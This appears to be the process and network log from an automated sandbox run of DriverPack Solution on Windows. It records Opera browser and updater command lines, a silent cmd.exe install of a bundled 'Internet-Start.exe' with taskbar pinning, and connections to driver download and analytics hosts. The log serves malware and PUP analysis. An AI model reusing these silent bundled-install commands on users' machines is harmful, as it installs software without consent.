"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=gpu-process --field-trial-handle=1056,12914147608555177072,11422088385206796381,131072 --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --gpu-preferences=KAAAAAAAAADgAAAgAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=16010406125199356463 --mojo-platform-channel-handle=1072 --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1056,12914147608555177072,11422088385206796381,131072 --lang=en-US --service-sandbox-type=network --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=2257806872661459315 --mojo-platform-channel-handle=1376 /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --ran-launcher --started-from-shortcut --flag-switches-begin --flag-switches-end --enable-quic --lowered-browser

C:\Program Files (x86)\Opera\64.0.3417.73\opera_crashreporter.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_crashreporter.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0x160,0x164,0x168,0x15c,0x16c,0x7feeeb95428,0x7feeeb95438,0x7feeeb95448

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=gpu-process --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --gpu-preferences=KAAAAAAAAADgAAAgAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=15958960555285245076 --mojo-platform-channel-handle=1096 --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --service-sandbox-type=network --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=5285396547359821864 --mojo-platform-channel-handle=1380 /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=2384035477198144379 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1960 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --extension-process --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=4546403189583390664 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --service-sandbox-type=utility --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=7876095752053464600 --mojo-platform-channel-handle=2228 --ignored=" --type=renderer " /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --no-sandbox --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=14832631397117078476 --mojo-platform-channel-handle=2484 /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=7349433560590431284 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2564 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=8817990431527603460 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=2744015530700141281 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=9300222058721055425 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2892 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=973887367548891030 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:1

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=renderer --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --disable-gpu-compositing --lang=en-US --extension-process --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 OPR/64.0.3417.73 (Edition Campaign 34)" --enable-auto-reload --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=574573385362482963 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\Internet-Start.exe" /S || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_78000.txt""

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\Internet-Start.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\Internet-Start.exe" /S

C:\Users\Admin\AppData\Roaming\DRPSu\syspin.exe

C:\Users\Admin\AppData\Roaming\DRPSu\syspin.exe "C:\Users\Admin\AppData\Roaming\DRPSu\Internet-Start.lnk" 5386

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --type=utility --field-trial-handle=1036,17087077793677909298,6664897496989360887,131072 --lang=en-US --service-sandbox-type=utility --enable-quic --with-feature:installer-experiment-test=off --with-feature:installer-use-minimal-package=off --ab_tests=DNA-70598-ref:DNA-70598 --service-request-channel-token=10632522820011618084 --mojo-platform-channel-handle=3772 --ignored=" --type=renderer " /prefetch:8

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --host=https://autoupdate.geo.opera.com/ --pipeid --version=64.0.3417.73 --edition="Campaign 34" --lang=en-US --producttype --requesttype=start --operadir="C:\Program Files (x86)\Opera\64.0.3417.73" --installdir="C:\Program Files (x86)\Opera" --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" --installationdatadir="C:\Program Files (x86)\Opera" --firstrunver=36.0.2130.80 --consent-info=eyJzdGFydHBhZ2VfbmV3c19jb25zZW50X2dpdmVuIjpmYWxzZSwic3RhdGlzdGljc19jb2xsZWN0aW9uX2VuYWJsZWQiOnRydWUsInVzZXJfZXhwZXJpZW5jZV9tZXRyaWNzX3JlcG9ydGluZ19lbmFibGVkIjp0cnVlfQ== --firstrunts=1714755097

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0xbc,0xc0,0xc4,0xb8,0xc8,0x13ff80650,0x13ff80660,0x13ff80670

C:\Program Files (x86)\Opera\launcher.exe

"C:\Program Files (x86)\Opera\launcher.exe" --scheduledautoupdate --autoupdaterequesttype=start --autoupdateoperaversion=64.0.3417.73

C:\Windows\TEMP\opera autoupdate\installer.exe

"C:\Windows\TEMP\opera autoupdate\installer.exe" --version

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --pipeid=oauc_task_pipe1343327d350b298dde82ca5ba24c4ac9 --version=64.0.3417.73 --lang=en --producttype --requesttype=start --downloaddir="C:\Windows\TEMP\opera autoupdate" --installationdatadir="C:\Program Files (x86)\Opera" --operadir="C:\Program Files (x86)\Opera\64.0.3417.73" --installdir="C:\Program Files (x86)\Opera" --user-data-dir="C:\Windows\TEMP\opera autoupdate" --nometrics --scheduledtask

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Windows\TEMP\opera autoupdate" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Windows\TEMP\opera autoupdate\Crash Reports" "--crash-count-file=C:\Windows\TEMP\opera autoupdate\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0xbc,0xc0,0xc4,0xb8,0xc8,0x13ff80650,0x13ff80660,0x13ff80670

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --host=https://autoupdate.geo.opera.com/ --pipeid --version=64.0.3417.73 --edition="Campaign 34" --lang=en-US --producttype --requesttype=shutdown --operadir="C:\Program Files (x86)\Opera\64.0.3417.73" --installdir="C:\Program Files (x86)\Opera" --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" --installationdatadir="C:\Program Files (x86)\Opera" --firstrunver=36.0.2130.80 --consent-info=eyJzdGFydHBhZ2VfbmV3c19jb25zZW50X2dpdmVuIjpmYWxzZSwic3RhdGlzdGljc19jb2xsZWN0aW9uX2VuYWJsZWQiOnRydWUsInVzZXJfZXhwZXJpZW5jZV9tZXRyaWNzX3JlcG9ydGluZ19lbmFibGVkIjp0cnVlfQ== --firstrunts=1714755097

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0xbc,0xc0,0xc4,0xb8,0xc8,0x13ff80650,0x13ff80660,0x13ff80670

C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\Opera_79.0.4143.22_Autoupdate_x64.exe

"C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\5680_1212092137\Opera_79.0.4143.22_Autoupdate_x64.exe"

C:\Program Files (x86)\Opera\launcher.exe

"C:\Program Files (x86)\Opera\launcher.exe" --forcedcheckforupdates="C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera"

C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\ready\installer.exe

"C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\ready\installer.exe" --internal-version

C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\ready\installer.exe

"C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\ready\installer.exe" --stream

C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe

"C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe" --install --autoupdate --installfolder="C:\Program Files (x86)\Opera" --silent --launchopera=0

C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe

"C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Windows\system32\config\systemprofile\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Windows\system32\config\systemprofile\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=79.0.4143.22 --initial-client-data=0x15c,0x160,0x164,0x130,0x168,0x7fef3712928,0x7fef3712938,0x7fef3712948

C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe

"C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe" --backend --install --import-browser-data=1 --enable-stats=1 --enable-installer-stats=1 --launchopera=0 --installfolder="C:\Program Files (x86)\Opera" --profile-folder --language=en --setdefaultbrowser=0 --pintotaskbar=0 --pin-additional-shortcuts=1 --server-tracking-data=server_tracking_data --initial-pid=8164 --package-dir="C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing" --inside-package --session-guid=c695804a-aea5-46f6-83e6-45fe26c81941 --autoupdate --silent --wait-for-package --initial-proc-handle=2803000000000000

C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe

"C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing\installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Windows\system32\config\systemprofile\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Windows\system32\config\systemprofile\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=79.0.4143.22 --initial-client-data=0x168,0x16c,0x170,0x130,0x174,0x7fef2e12928,0x7fef2e12938,0x7fef2e12948

C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe

"C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe" --backend --initial-pid=8164 --install --import-browser-data=1 --enable-stats=1 --enable-installer-stats=1 --launchopera=0 --installfolder="C:\Program Files (x86)\Opera" --profile-folder --language=en --setdefaultbrowser=0 --pintotaskbar=0 --pin-additional-shortcuts=1 --server-tracking-data=server_tracking_data --package-dir="C:\Windows\TEMP\opera autoupdate\CProgram Files (x86)Opera\installing" --inside-package --session-guid=c695804a-aea5-46f6-83e6-45fe26c81941 --autoupdate --silent --install-subfolder=79.0.4143.22

C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe

"C:\Program Files (x86)\Opera\79.0.4143.22\installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Windows\system32\config\systemprofile\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Windows\system32\config\systemprofile\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=79.0.4143.22 --initial-client-data=0x15c,0x160,0x164,0x130,0x168,0x7feef0c2928,0x7feef0c2938,0x7feef0c2948

Network

Country Destination Domain Proto
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 exampledd.matomo.cloud udp
DE 18.195.235.189:80 exampledd.matomo.cloud tcp
DE 18.195.235.189:80 exampledd.matomo.cloud tcp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
IE 54.220.192.176:80 dwrapper-prod.herokuapp.com tcp
DE 18.195.235.189:80 exampledd.matomo.cloud tcp
DE 18.195.235.189:80 exampledd.matomo.cloud tcp
US 8.8.8.8:53 dwrapper-dev.herokuapp.com udp
IE 54.220.192.176:80 dwrapper-dev.herokuapp.com tcp
US 8.8.8.8:53 auth.drp.su udp
GB 87.117.235.115:80 auth.drp.su tcp
US 8.8.8.8:53 update.drp.su udp
US 8.8.8.8:53 mc.yandex.ru udp
RU 93.158.134.119:443 mc.yandex.ru tcp
RU 37.9.8.75:80 update.drp.su tcp
US 8.8.8.8:53 dwrapper-prod.herokuapp.com udp
IE 46.137.15.86:80 dwrapper-prod.herokuapp.com tcp
IE 46.137.15.86:80 dwrapper-prod.herokuapp.com tcp
US 8.8.8.8:53 mc.yandex.com udp
RU 77.88.21.119:443 mc.yandex.com tcp
RU 77.88.21.119:443 mc.yandex.com tcp
GB 142.250.180.14:80 www.google-analytics.com tcp
GB 142.250.180.14:80 www.google-analytics.com tcp
US 8.8.8.8:53 exampledd.matomo.cloud udp
DE 18.157.122.248:80 exampledd.matomo.cloud tcp
RU 37.9.8.75:80 update.drp.su tcp
US 8.8.8.8:53 dl.driverpack.io udp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
US 8.8.8.8:53 dl.driverpack.io udp
US 8.8.8.8:53 dl.driverpack.io udp
US 8.8.8.8:53 dl.driverpack.io udp
US 8.8.8.8:53 dl.driverpack.io udp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 81.94.192.167:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.151:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
RU 37.9.8.75:80 update.drp.su tcp
US 8.8.8.8:53 crl.microsoft.com udp
US 2.18.190.71:80 crl.microsoft.com tcp
RU 37.9.8.75:80 update.drp.su tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
RU 37.9.8.75:80 update.drp.su tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
US 8.8.8.8:53 dl.driverpack.io udp
US 8.8.8.8:53 dl.driverpack.io udp
GB 87.117.239.150:80 dl.driverpack.io tcp
US 8.8.8.8:53 dl.driverpack.io udp
GB 87.117.239.151:80 dl.driverpack.io tcp
US 8.8.8.8:53 dl.driverpack.io udp
US 8.8.8.8:53 dl.driverpack.io udp
GB 81.94.192.167:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 87.117.239.151:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
GB 81.94.192.167:80 dl.driverpack.io tcp
GB 87.117.239.150:80 dl.driverpack.io tcp
US 8.8.8.8:53 download.driverpacks.net udp
DE 5.9.136.186:80 download.driverpacks.net tcp
US 8.8.8.8:53 download.driverpacks.net udp
DE 5.9.136.186:80 download.driverpacks.net tcp
US 8.8.8.8:53 dl.drp.su udp
GB 87.117.231.157:80 dl.drp.su tcp
US 8.8.8.8:53 dl.drp.su udp
GB 87.117.231.157:80 dl.drp.su tcp
GB 87.117.231.157:80 dl.drp.su tcp
GB 81.94.192.167:80 dl.drp.su tcp
US 8.8.8.8:53 download.driverpacks.net udp
US 8.8.8.8:53 bt2.driverpacks.net udp
GB 87.117.239.151:80 dl.drp.su tcp
DE 5.9.136.186:80 download.driverpacks.net tcp
GB 81.94.192.167:80 dl.drp.su tcp
DE 178.162.204.29:8080 bt2.driverpacks.net tcp
GB 87.117.239.150:80 dl.drp.su tcp
US 8.8.8.8:53 download.driverpacks.net udp
US 8.8.8.8:53 bt2.driverpacks.net udp
DE 178.162.204.29:8080 bt2.driverpacks.net tcp
DE 5.9.136.186:80 download.driverpacks.net tcp
US 8.8.8.8:53 download-storage.driverpack.io udp
GB 95.154.194.108:80 download-storage.driverpack.io tcp
US 8.8.8.8:53 dl.drp.su udp
US 8.8.8.8:53 download.driverpacks.net udp
US 8.8.8.8:53 bt2.driverpacks.net udp
DE 178.162.204.29:8080 bt2.driverpacks.net tcp
DE 5.9.136.186:80 download.driverpacks.net tcp
GB 87.117.239.150:80 dl.drp.su tcp
US 8.8.8.8:53 bt2.driverpacks.net udp
GB 87.117.239.151:80 dl.drp.su tcp
DE 178.162.204.29:8080 bt2.driverpacks.net tcp
US 8.8.8.8:53 bt2.driverpacks.net udp
DE 178.162.204.29:8080 bt2.driverpacks.net tcp
DE 18.157.122.248:80 exampledd.matomo.cloud tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
GB 87.117.239.150:80 dl.drp.su tcp
